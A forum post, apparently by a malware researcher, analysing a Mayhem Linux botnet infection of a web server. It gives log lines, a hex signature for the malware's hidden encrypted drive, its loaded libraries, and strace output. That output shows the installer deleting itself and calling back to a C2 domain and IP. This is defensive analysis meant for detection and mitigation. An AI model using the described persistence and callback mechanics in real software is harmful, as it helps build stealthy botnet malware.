This is the Mayhem incident in July 30th. The attacker was detected to install the installer as per snipped in log below:
Code: Select all178-137-18-246-lvv.broadband.kyivstar.net - - [28/Jul/2014:01:16:02 +0900] "GET /wp-content/themes/XXXX/styleimg.php HTTP/1.1" 200 85 "-" "Python-urllib/2.7" "-"
You can see the installer in the attached file (with the binary stipped, sorry)
This installer will create the encrypted drive ".fghv". About this drive, has typical sigs in the first sector as:
Code: Select all0000 23 74 FA 49 37 F6 DF D0 17 72 08 E1 B1 73 B3 1D #t.I7....r...s..
0010 B4 D9 54 45 38 5A A9 AB 5D E8 BE 47 30 99 69 EE ..TE8Z..]..G0.i.
0020 FD FB 8F DB 18 46 E9 31 72 9B 45 0D 03 ED 2E FB .....F.1r.E.....
0030 BF 0E FB B6 80 F6 40 70 2E 55 57 96 EB EF AC E6 ......@p.UW.....
0040 D8 D4 E9 DE D9 1E 13 F7 D8 D4 E9 DE D9 1E 13 F7 ................
Noted: I think one can apply this sig to Yara or AV scanner to check whether the server is infected.
The tools in below links can be used to read this drive:
http://ultra-embedded.com/fat_filelib
https://github.com/freeoks/SD0_reader
The drives was mounted in every infection of Mayhem with the read write flag, in memory is seen as:
Code: Select allhost 15448 mmd mem REG RW 9,2 12582912 29763122 /home/mmd/0x02E/007/.fghv
The insides will be seen files used for the attack as per annonced by Yandex team here:
https://www.virusbtn.com/virusbulletin/ ... -fig11.jpg
In this post I will (generally) debug the installer, with some comments.
The point of this information is to form the mitigation for the threat installation.
1. Since the nature of installation need the LD_PRELOAD interception of
the NIX API called /usr/bin/host, you will see every Mayhem infection is
loading these modules (i.e. in x64):
Code: Select all /lib/x86_64-linux-gnu/libnss_dns-2.13.so
/lib/x86_64-linux-gnu/libnss_files-2.13.so
/usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so
/lib/x86_64-linux-gnu/libm-2.13.so
/lib/x86_64-linux-gnu/liblzma.so.5.0.0
/lib/x86_64-linux-gnu/libattr.so.1.1.0
/usr/lib/libisccc.so.80.0.2
/lib/x86_64-linux-gnu/libz.so.1.2.7
/lib/x86_64-linux-gnu/libresolv-2.13.so
/lib/x86_64-linux-gnu/libkeyutils.so.1.4
/usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
/lib/x86_64-linux-gnu/libcom_err.so.2.1
/usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
/usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
/usr/lib/libGeoIP.so.1.4.8
/lib/x86_64-linux-gnu/libc-2.13.so
/usr/lib/x86_64-linux-gnu/libxml2.so.2.8.0
/lib/x86_64-linux-gnu/libpthread-2.13.so
/lib/x86_64-linux-gnu/libcap.so.2.22
/lib/x86_64-linux-gnu/libdl-2.13.so
/usr/lib/libisc.so.84.1.0
/usr/lib/libisccfg.so.82.0.3
/usr/lib/libbind9.so.80.0.7
/usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
/usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
/usr/lib/libdns.so.88.1.1
/usr/lib/liblwres.so.80.0.3
/home/mmd/0x02E/007/libworker.so
/lib/x86_64-linux-gnu/ld-2.13.so
the libworker.so is
the malware, libnss is used to resolve the DNS, and some modules
specifically use by malware itself (self explanatory..ie: that crypto
& GeoIP)
2. Mayhem installer process:
(malware installer blah.so started with initial PID)
// process self-detached execution after /usr/bin/hosts was executed:
Code: Select allexecve("/home/mmd/0x02E/007/1.20322", ["/home/mmd/0x02E/007/1.20322"], [/* 20 vars */]) = 0
// local addr INET
Code: Select allsocket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6
connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS SETTING")}, 16) = 0
getsockname(6, {sa_family=AF_INET, sin_port=htons(47377), sin_addr=inet_addr("YOUR_IP")}, [16]) = 0
// uname executed by shell escape:
Code: Select allexecve("/bin/sh", ["sh", "-c", "/bin/uname -a"], [/* 19 vars */]) = 0
write(1, "Linux 1x111 3.2.0-4-amd64 #1 SMP"..., 73 <unfinished ...>
// read the ELF after reforked beforehand..
Code: Select allread(8, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
fstat(8, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
// self deletion..creating the encrypted drive:
Code: Select allunlink("/home/mmd/0x02E/007/libworker.so") = 0
open(".fghv", O_RDWR) = 8
// reforked, attempt to access "/" (server's root), self closing +open /dev/null..
Code: Select allclone(Process xxx attached
umask(0) = 022
setsid() = 20333
chroot("/") = -1 EPERM (Operation not permitted)
:
close(0) = 0
close(1) = 0
:
close(1021) = -1 EBADF (Bad file descriptor)
close(1022) = -1 EBADF (Bad file descriptor)
:
open("/dev/null", O_RDONLY) = 2
open("/dev/null", O_RDONLY) = 3
// preparing sending DNS request..
Code: Select allopen("/etc/resolv.conf", O_RDONLY) = 4
uname({sys="Linux", node="1x111", ...}) = 0
connect(4, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
open("/etc/nsswitch.conf", O_RDONLY) = 4
read(4, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 475
open("/etc/ld.so.cache", O_RDONLY) = 4
open("/lib/x86_64-linux-gnu/libnss_files.so.2", O_RDONLY) = 4
open("/lib/x86_64-linux-gnu/libnss_dns.so.2", O_RDONLY) = 4
// querying IP address for the CNC..
Code: Select allsocket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
poll([{fd=4, events=POLLOUT}], 1, 0) = 1 ([{fd=4, revents=POLLOUT}])
sendto(4, "\242U\1\0\0\1\0\0\0\0\0\0\vimbosatelit\3biz\0\0\1\0"..., 33, MSG_NOSIGNAL, NULL, 0) = 33
recvfrom(4, "\242U\201\200\0\1\0\1\0\0\0\0\vimbosatelit\3biz\0\0\1\0"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 49
// callback sent:
Code: Select allsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("62.75.179.242")}, 16) = 0
write(4, "POST /go.php HTTP/1.0\r\nHost: imb"..., 173) = 173
read(4, "HTTP/1.1 404 Not Found\r\nServer: "..., 32768) = 367
read(4, "", 32768) = 0
This CNC is in Germany, an abused host, I wrote this for the LE follow as verdict:
Code: Select all$ echo 62.75.179.242 |bash origin.sh
62.75.179.242|static-ip-62-75-179-242.inaddr.ip-pool.com.|8972 | 62.75.128.0/17 | PLUSSERVER | DE | INTERGENIA.DE | INTERGENIA AG
3. Samples for this incident are attached with the PCAP. (members only)
In VT, the
x32 installer ELF:
https://www.virustotal.com/en/file/4275 ... 406866832/
x64 installer ELF:
https://www.virustotal.com/en/file/dce6 ... 406866857/
If you work in AV entity and suppoting linux/freebsd OS in your
marketing pamflets, please help to raise detection ratio of this threat
by registering the shared sample to raise the detection ratio. This
threat is no joke, it aimed all of Wordpress and Joompla to be a huge
CHAOS botnet..
#MalwareMustDie!
+) basic knowledge of the threat:
http://blog.malwaremustdie.org/2014/05/ ... lware.html